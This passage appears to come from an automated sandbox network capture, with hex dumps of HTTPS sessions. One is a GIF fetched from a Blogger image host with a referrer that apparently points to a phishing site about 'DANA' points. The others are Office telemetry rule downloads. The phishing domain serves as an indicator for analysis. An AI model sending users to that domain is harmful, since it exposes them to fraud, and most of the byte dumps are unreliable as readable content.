                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 8c 90 ce 04 4c cb 03 0c 0f 0c 4d 0d 4c c6 c1 28 3e 0c d4 3c 0a fc 8b 03 29 3e d3 fc bc cf 2c 4d 10 a4 ca 83 9b 49 0e 81 30 db dc 4d af c2 4d 2f ac 2a de 0c 4e ff 81 83 41 a6 7c 49 e1 3c 4e 28 2b 4a bd 03 4e e4 6c ce fc 22 ce e5 34 4e e7 9c ce 88 83 4e 1e 94 47 ea cc 4e e0 b2 4e 21 5c 4a ed 0c 29 c4 7c c8 45 24 44 c7 ac af ae b4 4c ec 83 4c f5 24 2f ad cc 44 35 0c ca cc 7c c8 b0 5c c7 f0 3c 4c c3 bc c4 b2 2c c7 dc 54 48 fd f4 c3 f5 4c c9 f1 34 c1 f8 9c 0b 78 34 ba 0f 89 4d c4 78 cb 48 41 50 d9 e4 40 05 5c 50 06 25 be 0c 48 cd 09 f5 0b bd ac 50 d9 eb 4b 08 8c d0 cd 4b c0 e5 5b 8e 05 fc 40 c2 bc ca fa 14 cb 12 e5 ab f6 d4 3f 93 5c cc 36 8c cc ef 64 45 e5 bc ce b4 7b 51 1a 95 23 df ac 9f 21 ac 51 1d 95 9f a8 a4 c8 5d dc 51 20 8d 9d 1e 15 3f ef 0c 52 23 c5 a1
                                                                                                                            Data Ascii: LML(><)>,MI0MM/*NA|I<N(+JNl"4NNGNN!\J)|E$DLL$/D5|\<L,THL4x4MxHAP@\P%HPKK[@?\6dE{Q#!Q]Q ?R#
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 69 9d 2e 61 27 ad 5e 97 9e 2c 89 8e 69 99 06 e9 5c be 68 a3 b6 e8 78 e6 e9 f0 c5 e4 1b c2 a0 cb e8 8a a1 8e ea 4f 06 68 f1 a2 b5 66 d6 5d 10 36 b3 0e e8 0f cd 90 ea 83 16 ea a7 21 d9 78 0d 5e 8c 1c 67 58 96 e6 05 a3 3d af 96 e9 98 3e 1d b1 be df 79 35 6b f2 31 5a 24 ee 60 23 3e 62 07 55 e6 b5 1e ea 26 39 9d bb 46 be d6 84 e0 c3 dd d0 bf ae 0c 0d 16 cc 09 f9 e0 72 db ea bd fe 68 b0 76 2b 42 93 67 d0 c5 c7 60 de 64 b4 4e 4e 83 6e ec 8f 0e eb b7 fe 5f 6f 46 44 01 3e 5a a5 5d e0 c2 8e 0c 16 7b 8a c7 d1 ec 7b 7e 6c a7 36 8c 63 0d 0c af 85 6d 61 a5 50 d8 0c be d7 fe cb c0 8e ed d2 36 6d 1e c6 61 ff d2 56 e2 e6 ac 23 d5 fe ea 5b 86 6c b8 50 30 17 43 ee 61 fb ec e3 7a e8 9f 86 4a a8 56 01 a1 1e 6e 64 ee 6b e3 be 97 e5 5e 3b e5 4e ee 5f a6 52 9f 7e 6e a3 2a a9 cc
                                                                                                                            Data Ascii: i.a'^,i\hxOhf]6!x^gX=>y5k1Z$`#>bU&9Frhv+Bg`dNNn_oFD>Z]{{~l6cmaP6maV#[lP0CazJVndk^;N_R~n*
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 86 81 f9 d5 a1 87 66 81 e8 10 85 ff 59 38 e2 59 cb 31 94 20 8a 0c 89 b8 d2 7e 31 ca 38 23 8d 35 da 78 23 8e 39 ea 78 63 75 34 7a f0 a3 07 28 ed 38 24 91 45 1a 79 24 92 fb f5 38 63 7f 4d 9a 40 63 06 19 68 30 a5 06 51 26 79 25 96 59 6a b9 25 97 33 96 78 02 94 52 52 39 ff 65 97 65 9a 59 e6 92 32 fe 08 d3 8f 5c 8a 07 61 8b 09 f5 47 e1 89 71 6e a5 e2 86 17 da 89 d0 8b 7b 82 00 67 9c fb cd 59 e1 8a 9e f9 39 95 86 45 e9 75 e8 41 7d 32 fa a8 72 5f 95 08 69 86 a2 cd 46 29 a6 99 46 c4 dd 81 9a 42 f7 5b 7c 9e 8a 9a a9 71 9d 8e ca d8 4d a7 aa ea 29 7d ab 3a d5 aa ab b1 1e 5a aa ac ac fd 56 2b ae 71 72 9a 2b 50 89 f2 fa 2b 81 e6 05 08 6c 6c 96 86 4a 2c 86 80 b6 38 e1 a4 85 72 88 ac 6f ad e5 c9 28 83 d4 2e 05 a9 93 fd d5 09 6d 45 78 2a fa 58 9c d5 1e aa 2c 8a cc d2 e9
                                                                                                                            Data Ascii: fY8Y1 ~18#5x#9xcu4z(8$Ey$8cM@ch0Q&y%Yj%3xRR9eeY2\aGqn{gY9EuA}2r_iF)FB[|qM)}:ZV+qr+P+llJ,8ro(.mEx*X,


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            58192.168.2.649794172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC916OUTGET /img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:13 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:12 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (5).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1188349
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:13 UTC910INData Raw: 47 49 46 38 39 61 57 02 b0 03 f7 00 00 00 7e dd 00 83 e8 02 9f c1 04 89 ef 04 91 f9 05 50 89 05 69 b6 06 65 aa 06 66 b0 06 78 ce 06 8d f2 06 8f f3 09 84 dd 09 87 e5 09 89 ea 09 8c ed 0b 8b ec 0b 90 f1 0c 8b e8 0c 8d e9 0d 8b e6 0d 8b e8 0d 8f ec 0e 8b e8 0f 8b e7 0f 8b ea 0f 8c e8 0f 8c e9 10 6d b2 10 82 d5 10 86 dc 10 88 e0 10 8a e3 10 8a e5 10 8b e5 10 a6 dc 11 7e cf 11 8b e5 11 8e e0 12 91 ee 13 8a e8 16 88 de 17 83 d3 17 9d f9 1b c9 ce 1e 6f aa 1e 7c c3 1e 93 eb 21 4c 6d 22 d3 d5 23 86 d1 23 d0 d5 23 d2 d2 23 db dc 24 6c a2 24 d1 d4 25 d1 d3 25 d2 d4 26 77 b4 26 d1 d3 27 82 c5 27 a3 f9 27 d1 d4 27 e3 e5 28 c0 f4 28 d0 d1 28 d0 d4 28 d1 d1 28 d2 d4 28 e3 e3 29 c9 d3 29 d1 d3 29 e1 e6 29 e2 e4 2b dd e9 2c 91 db 2c e1 e2 2e ce cd 2e e5 e6 30 c4 d1 31 e9
                                                                                                                            Data Ascii: GIF89aW~Piefxm~o|!Lm"####$l$%%&w&''''(((((())))+,,..01
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 30 63 1e 1c 39 f2 c2 85 95 1a 58 c2 dc 68 b1 24 c7 0d 39 57 ca 1c fa f0 61 c1 a0 29 93 76 2c 8a 90 e6 84 a1 50 a3 4a 9d 4a b5 aa 55 ab 13 2b fe 84 99 35 eb c8 a1 4e c3 3e dd 60 f2 60 d0 b3 3a af aa 5d eb 52 ec 47 9b 38 d3 ba f4 59 72 20 d2 9c 6c 19 1a 25 88 36 e8 52 86 21 f3 0a 1e 4c b8 b0 e1 85 7b c9 4a a4 28 b3 2b c5 af 32 dd d2 84 a8 11 21 da 94 72 0f 6b a6 2a 19 2e 66 bc 3b e9 5e b4 9b 13 f3 e6 81 89 05 de f5 8b 31 f5 4c 90 a7 63 cb 9e 4d bb 20 0a 9b 02 bb 72 04 dd d2 f1 06 c8 31 25 43 2e cb 1b 68 52 a1 b5 93 7b 74 7b 57 69 68 d1 a3 9b cb 76 dd 1c 65 d5 c0 ca b3 6b df 0e d5 28 4f 08 a3 5f fa ff 06 0e 53 b8 48 d1 27 d1 72 5f 5f 50 b2 6a f5 cf a1 bf 3f 3b dd 32 fc 86 ae 0d 62 67 cf bf bf ff 81 65 c5 e4 5b 6d 01 1e d5 57 66 ff 19 76 20 82 06 c1 75 5f 42
                                                                                                                            Data Ascii: 0c9Xh$9Wa)v,PJJU+5N>``:]RG8Yr l%6R!L{J(+2!rk*.f;^1LcM r1%C.hR{t{Wihvek(O_SH'r__Pj?;2bge[mWfv u_B
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 38 9b 89 58 ef 05 29 f0 c0 17 06 61 09 5d c8 82 a6 30 65 06 34 62 5a d3 7b e6 b4 9e ed 84 06 34 40 91 88 1e a0 e0 23 13 24 4b 53 29 e3 22 a6 a6 71 23 09 8d 22 06 a2 78 1b 0c e0 06 62 0c e5 ec f5 36 bb 59 51 d9 a4 6a 10 43 cc ed fc 14 51 db 4d b4 4a d8 c4 68 6b 3f b7 af 70 ff 21 2b 84 23 2d a3 07 91 65 51 b3 dd 76 9a b9 6d a3 5c 38 4a 95 9c 44 24 7b 4b 48 c1 1c 22 e1 57 77 36 83 a6 31 8d e9 3d 0d 9b 53 69 f0 34 18 d0 e8 05 2f 16 01 86 07 2c 60 82 29 b0 60 04 b7 a5 54 ba b8 8a 2e 99 3d 01 0a 42 d0 80 28 aa b7 83 71 c5 de 7a 45 6b 3d d3 2a c4 02 1b 38 81 40 2a 70 10 66 7d 10 84 28 6c ab 4c 3c ca 5a d9 b2 70 85 08 22 ae b7 6c 85 d6 67 0e 29 27 44 25 aa f1 d4 e5 b6 12 7e 32 7d 6a e9 5b 09 40 b0 04 33 84 c2 14 82 9d 69 34 82 51 cf e8 32 23 18 d6 ad e9 4c 7b 31
                                                                                                                            Data Ascii: 8X)a]0e4bZ{4@#$KS)"q#"xb6YQjCQMJhk?p!+#-eQvm\8JD${KH"Ww61=Si4/,`)`T.=B(qzEk=*8@*pf}(lL<Zp"lg)'D%~2}j[@3i4Q2#L{1
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 70 08 6a 10 05 c9 a5 03 53 e0 06 86 d0 0a b2 00 6e bd c0 0c d2 d0 0a 65 40 88 29 d0 86 41 76 02 9c a0 7e ec d4 0b 7f 36 62 c2 14 0c 9f 00 07 1d c0 6a 29 80 82 1e 60 3d 8d 36 07 a0 70 4f bc d0 7e 61 f9 52 d1 20 0a f1 47 88 9f 86 43 ea 85 74 6e 10 09 32 45 62 42 29 0d cf f0 0c c1 a0 09 4b a0 02 d7 73 44 27 c0 12 84 68 06 8b f0 4e c0 00 73 ef 14 98 b1 a0 09 2b 60 02 75 96 5f 11 64 01 ff 35 92 91 51 92 e9 e2 99 15 a5 92 a2 a9 83 bc 13 52 8f 34 84 9a 61 9a 57 21 02 20 a0 00 2b f0 61 bc 20 0d ea c7 4b b5 40 0b 04 79 9b f2 c4 62 b1 40 09 7d 00 07 51 c0 03 f1 67 3d 32 a0 02 f1 e7 06 a6 e0 4e 4d 28 68 99 60 95 d6 93 95 5b f9 4e b5 f0 88 2f f5 52 f0 34 53 a9 50 05 57 c0 6a 16 20 01 26 d0 01 27 90 88 40 f0 09 ba ff 04 8e ed 24 4c ed 37 4f 7b 90 05 98 78 52 38 14 88
                                                                                                                            Data Ascii: pjSne@)Av~6bj)`=6pO~aR GCtn2EbB)KsD'hNs+`u_d5QR4aW! +a K@yb@}Qg=2NM(h`[N/R4SPWj &'@$L7O{xR8
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: de 15 01 2a f0 05 ad 10 95 cd b0 c6 41 86 02 7d ec c5 87 f7 09 68 80 cd a0 97 88 11 00 04 85 07 0d c5 5c 67 7f fc 3d 7f 93 23 f8 21 57 04 51 30 ce c7 c0 92 0b aa 21 1b 92 df f4 60 26 28 61 08 72 a1 3e 58 d0 1e 37 b2 c6 72 b7 a1 6c ce 91 09 0d a7 fb 11 76 79 57 27 98 7b de 83 7b 48 a5 5e 34 0c 0d 87 25 0d 23 d6 08 53 30 00 d9 9c ce bb cc 0c bd ac 00 09 65 80 3c 80 05 55 7a 9f 60 ff c0 c4 1b 69 02 c0 07 c5 d2 50 09 65 d0 5e a4 f7 4f 01 00 04 bc 20 a4 cc 90 c5 41 86 7a ac 26 9e bb 04 09 65 90 be 7d a3 00 66 4c ce 2c 2a 0d 5f e0 02 48 1b cf 4f ac 4b d0 10 09 5d 10 00 48 3b 7b 03 60 c5 fd 0b 0c 6a 30 05 e9 96 cf a6 23 25 93 a5 5a ef 93 3b 01 1d a2 03 ad 4a 0e cd 38 d2 57 3c 0b 6d b1 eb 62 5b 0f 1d 15 13 21 c2 03 e0 a3 60 89 9c a4 ac c2 16 00 80 75 3c 72 1a 60
                                                                                                                            Data Ascii: *A}h\g=#!WQ0!`&(ar>X7rlvyW'{{H^4%#S0e<Uz`iPe^O Az&e}fL,*_HOK]H;{`j0#%Z;J8W<mb[!`u<r`
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 2f af b4 32 eb 93 65 00 0a d8 28 32 7c 92 f5 b5 52 ff 96 15 04 32 4c e0 9d e2 4b 2b 5d d0 90 99 21 b1 10 b6 02 ac af a0 31 ab d4 25 81 00 d3 0c 18 a0 e6 15 ac 99 40 82 04 4a 7c a0 c0 fb 21 46 8c 1c 33 80 17 5f 5e a3 c7 9e e9 43 46 65 df 9e e5 d3 97 3d 71 da 44 29 9f 27 7d f7 f9 f5 bf 84 2f 14 e9 7e ff 2a 02 10 a8 a9 36 98 68 ac 44 3a 63 a6 ae e5 64 e1 c4 0c 2c 30 8b 80 80 1e 7a f8 a2 0e 48 40 51 8d 97 ae f8 0a 66 39 68 a0 79 e5 15 bd a0 f9 90 19 5e 1e 81 ad aa c2 54 e9 85 17 18 15 ab 0e 99 60 5e 44 a4 0c 19 96 80 00 02 14 4a 90 90 80 4a 3a fb ac 8c 17 4c c8 ed 85 13 4c e0 62 c4 c4 f0 d0 02 85 d7 50 a8 8a b6 af 20 c9 e2 84 08 76 e3 4d 85 df 64 11 8e 0b 15 76 44 e1 85 01 92 7b 06 9a 4a d0 b0 e0 2c 36 51 f8 82 17 64 a2 61 86 8d ec 4a 40 48 21 86 1c 02 6f 22
                                                                                                                            Data Ascii: /2e(2|R2LK+]!1%@J|!F3_^CFe=qD)'}/~*6hD:cd,0zH@Qf9hy^T`^DJJ:LLbP vMdvD{J,6QdaJ@H!o"
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 51 98 8b 3b 70 1a ca 4e 05 11 44 29 e8 e7 b4 5f 01 eb 68 71 2a 68 79 ad 73 3f 7f 06 a7 19 a1 28 03 0a 25 00 30 74 95 80 02 a3 b4 40 60 90 45 41 d6 8a 89 a3 07 dc e8 cc 7c e8 90 09 68 e0 a6 46 54 58 35 79 23 81 e3 10 e6 04 1f c0 2f 6c 64 89 99 53 f9 68 b3 01 ce d2 2c 03 b3 4b 0a 3c 40 c3 0f b0 93 25 3d 09 3a 77 51 16 36 0e 68 5d 52 61 b7 cd 94 54 d7 8d d8 6d ee ed 74 a7 dc a8 4c 35 bb 30 a6 f1 ee ea a8 ce 13 b3 d3 8e 72 7c 5d ce e6 79 b2 77 7e 0c 04 e5 52 00 0f da d0 0a 59 d4 45 5a fe ff 1c 64 30 f6 b2 17 f3 16 b4 17 5c 49 cc 5c a0 41 0b 36 44 61 05 0c 99 c0 0c 51 d0 9d 54 22 76 22 55 e1 68 45 64 d3 ce 12 2c 24 02 0f 40 e6 7b bb 03 9b 7b bd 59 30 68 09 e1 52 28 a2 d2 d8 46 60 01 12 be af 43 34 9c 25 64 22 2b 95 13 90 00 65 79 23 82 10 2c f6 05 1e a0 a6 bb
                                                                                                                            Data Ascii: Q;pND)_hq*hys?(%0t@`EA|hFTX5y#/ldSh,K<@%=:wQ6h]RaTmtL50r|]yw~RYEZd0\I\A6DaQT"v"UhEd,$@{{Y0hR(F`C4%d"+ey#,
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: f8 c8 a7 14 43 d1 c4 31 34 5a c2 dd 52 c1 bd 6b ba 99 2c b8 9a bc 09 ad cb c9 83 db 49 0b e8 c9 cb 84 48 80 ab cd a8 b3 c8 ed 23 c7 cb d3 0f dd dc 9d 2e 6c 94 ff 9d 1b 94 e1 bc 4d 81 db ad c6 7c 4d 96 d8 37 e5 ec c8 cd c4 19 87 c4 cd 15 d3 34 e9 f4 37 84 24 bf b1 44 4d d0 1b cb 70 ea 4a 68 ac ce 46 5c 2a 68 13 4b a0 60 4e 4f b4 ae 69 04 4f f5 9c 4c a8 83 c5 14 fc bc 01 69 4f 72 f2 4e 94 5b cf d3 dc a8 52 93 cf 95 30 cf eb 44 c1 f3 5c 4f 00 15 ca fe 94 89 ff 2c b5 ae 13 4c ee 24 27 f2 a8 09 f0 44 ce 02 fc 09 fe 64 c1 a5 1c d0 00 ad 50 70 94 50 2f cc 4e f8 dc c7 04 0d a7 05 b5 cf dd f2 3c 55 2c cf d7 69 ce 09 c5 50 0b 4d 51 f1 a3 d0 f0 ec d0 15 74 d1 de f9 50 f5 bc 4f 68 63 8a eb 8c 50 18 4d 48 8d 50 49 15 ed 51 cc 24 ca c0 34 4a 39 0c 4c f7 f8 cd ab cc 51
                                                                                                                            Data Ascii: C14ZRk,IH#.lM|M747$DMpJhF\*hK`NOiOLiOrN[R0D\O,L$'DdPpP/N<U,iPMQtPOhcPMHPIQ$4J9LQ
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 69 9d 56 1e 4a 9d c6 df f5 dc 8a b6 64 77 85 56 76 25 69 a3 f6 d7 87 26 e8 24 06 4d 3a 1e e5 9f 3e 6a a8 ae d5 6b 8e e6 6c 6e c3 6d 8e 6a ac 36 54 fd 64 d8 f0 25 59 85 cd 6a b0 8e d2 a9 46 b8 ab 0e 6b b3 ee d1 b1 f6 bc aa 2e d2 b2 3e 6b b7 0e d0 b4 1e cf b5 6e ea b7 ae eb 71 ed 64 68 de 3a 35 ec 59 7f b6 6b bf b6 50 bc 06 6a 1e 96 68 d1 75 63 de fd 6b c4 9e 51 c6 3d e1 8d fe dc eb f9 5b 84 7e 5a 4c 66 ec c4 ae ec b5 4c ea c6 1e 19 d9 15 6a f4 c4 67 52 b6 6c d0 16 56 67 75 5c a2 26 e5 69 f5 4f a8 15 e9 d0 5e 6d d6 ad dd 51 79 5e 38 d6 5f 39 7d ec 2f 4e e4 96 98 5f 8e f6 d2 85 66 6d de be 50 ff ce 45 49 d2 2e e4 3c 3e 68 90 e6 89 dc 81 db de 4e 6e 50 45 54 84 0d ea 33 8e 68 e5 8e ee 15 dd e6 7d 95 66 6d c6 61 e9 ce ee a8 c2 6d fd b5 cd bc 56 6b 43 e1 6e e4
                                                                                                                            Data Ascii: iVJdwVv%i&$M:>jklnmj6Td%YjFk.>knqdh:5YkPjhuckQ=[~ZLfLjgRlVgu\&iO^mQy^8_9}/N_fmPEI.<>hNnPET3h}fmamVkCn
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 7c b2 f9 07 21 88 21 8a 38 22 49 12 ce 66 df 40 15 6a 57 02 8b 25 64 68 20 87 4b 79 f8 1c 7a 24 da 78 23 8e 37 9a 98 9c 41 2a 86 e6 a2 8b 2f be 17 23 43 03 12 98 23 92 49 2a 89 df 8e 35 a6 b7 23 65 09 ce e8 e4 92 55 5a 79 25 6b e4 55 e4 63 4f 5a 62 f9 25 98 61 a6 e6 ff e5 44 5c 0a d4 54 94 1d 8a b9 26 9b 6d 6a 45 e6 41 a6 a9 e9 13 9c 6e da 79 27 9e 25 4a 99 91 99 93 39 e5 d8 9e 79 0a 3a e8 65 8b 19 ea 57 5e 88 b6 75 e8 59 89 32 fa 28 a4 91 4a 3a 29 a5 95 5a 7a a9 5f fb d5 09 51 9f 3a 6d 4a 28 a8 a1 86 da e4 91 cd 05 6a a4 41 1a 12 19 27 8f a2 ba fa 2a 49 75 c9 3a 2b ad b5 da 7a 2b ae b9 ea aa 6b 06 12 40 90 81 ad 14 08 3b ac b0 b4 f6 fa 6b af 74 7d f5 16 7b 72 79 45 97 04 d1 4a ab ec 05 bb ce 7a 2c b0 b5 12 4b ac b5 dd 7a fb 2d b8 e1 8a 3b 2e b9 e5 9a 7b
                                                                                                                            Data Ascii: |!!8"If@jW%dh Kyz$x#7A*/#C#I*5#eUZy%kUcOZb%aD\T&mjEAny'%J9y:eW^uY2(J:)Zz_Q:mJ(jA'*Iu:+z+k@;kt}{ryEJz,Kz-;.{


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            59192.168.2.64980013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 469
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                            x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115012Z-1657d5bbd48xlwdx82gahegw400000000260000000005pv7
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:12 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            60192.168.2.64980213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 494
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                            x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115012Z-1657d5bbd48xsz2nuzq4vfrzg800000001ug000000006w0y
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:12 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            61192.168.2.64979813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 464
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                            x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115012Z-1657d5bbd48xsz2nuzq4vfrzg800000001qg00000000fvhk
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
